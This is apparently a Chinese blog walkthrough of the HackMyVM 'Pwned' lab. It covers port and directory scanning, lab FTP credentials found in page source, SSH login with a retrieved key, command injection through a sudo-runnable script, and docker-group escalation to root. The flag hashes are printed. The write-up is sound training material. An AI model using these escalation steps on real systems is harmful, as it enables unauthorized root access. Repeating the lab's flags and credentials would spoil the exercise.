文章

Pwned

发表于
作者 3 分钟阅读

Pwned

老样子vmware导入,升级,改Nat,打开以后:

image-20240316131846915

看上去一切正常,扫描一下:

image-20240316132219107

没扫到?

应该是因为本来是给virtualbox设计的,以1.0协议导出重新配置一下试试,还是扫不到网卡,难道不能扫?

打开virtualbox看看能不能扫到,依旧不行。。。重新配置一下vmware的靶场再扫一下:

1

sudo netdiscover -r 10.161.61.0/24

image-20240316135652220

依然无法扫描到,真的是很邪门,看来virtualbox的靶场配置到vmware上,还是有不少问题。

只能先进去看下地址了,参考渗透靶机扫描不到ip地址_扫不到靶场ip-CSDN博客

image-20240317202909176

扫不出来。。。直接查flag吧:

1
2

fb8d98be1265dd88bac522e1b2182140
4d4098d64e163d2726959455d046fd7c

本题考察的是docker逃逸,回头去别的地方再尝试吧。

信息搜集

端口扫描

1

nmap -Pn -p- 10.161.216.116

image-20240317203119772

重新配置了一下:

1

nmap 10.161.216.116

1
2
3
4
5
6
7
8
9
10

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-17 08:52 EDT
Nmap scan report for 10.161.216.116
Host is up (0.00094s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds

目录扫描

1

gobuster dir -u http://10.161.216.116/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60

1
2
3
4

/nothing              (Status: 301) [Size: 318] [--> http://10.161.216.116/nothing/]
/server-status        (Status: 403) [Size: 279]
/hidden_text          (Status: 301) [Size: 322] [--> http://10.161.216.116/hidden_text/]
Progress: 220560 / 220561 (100.00%)

漏洞利用

查看一下敏感目录

http://10.161.216.116/nothing

image-20240317205848126

image-20240317205910019

image-20240317205931263

再看一下别的:

http://10.161.216.116/hidden_text

image-20240317210029288

/hacked
/vanakam_nanba
/hackerman.gif 
/facebook
/whatsapp
/instagram
/pwned
/pwned.com
/pubg 
/cod
/fortnite
/youtube
/kali.org
/hacked.vuln
/users.vuln
/passwd.vuln
/pwned.vuln
/backup.vuln
/.ssh
/root
/home

是一个字典,拿来扫一下:

1

gobuster dir -u http://10.161.216.116/ -w secret.dic -t 60

1

/pwned.vuln           (Status: 301) [Size: 321] [--> http://10.161.216.116/pwned.vuln/]

查看一下:

image-20240317210255985

尝试弱密码以及万能密码,无果,查看一下源代码,看看有没有东西。

image-20240317210427229

我擦原来在这里,尝试ftp查看文件:

ftp连接

1
2
3

ftp 10.161.216.116
ftpuser
B0ss_B!TcH

image-20240317210816905

拿到了私钥和用户名,尝试进行连接:

1
2
3

chmod 600 id_rsa
ssh ariana@10.161.216.116 -i id_rsa
# ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i id_rsa ariana@10.161.216.116 没用上不过记录一下

image-20240317211412442

查看基础信息,居然和kali的信息很像(id),哈哈哈!

image-20240317211623851

发现messenger.sh文件不需要selena用户认证即可运行。

运行一下,发现有三个用户,随便输入一个,弹出来了一个shell,扩展一下,我这边傻乎乎的以ariana先运行了一遍,哈哈哈:

1
2

# 以selena用户运行程序
sudo -u selena ./messenger.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

# Welcome to linux.messenger 


# ariana:
# selena:
# ftpuser:

Enter username to send message : selena

Enter message for selena :/bin/bash

# Sending message to selena 
whoami;id
# selena
# uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
python3 -c "import pty;pty.spawn('/bin/bash');"
selena@pwned:/home$

查看id发现用户在docker组:

image-20240317212933458

尝试进行docker提权:

1

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

获取flag!

image-20240317213155649

Training platform, Hackmyvm
Hackmyvm web
本文由作者按照 CC BY 4.0 进行授权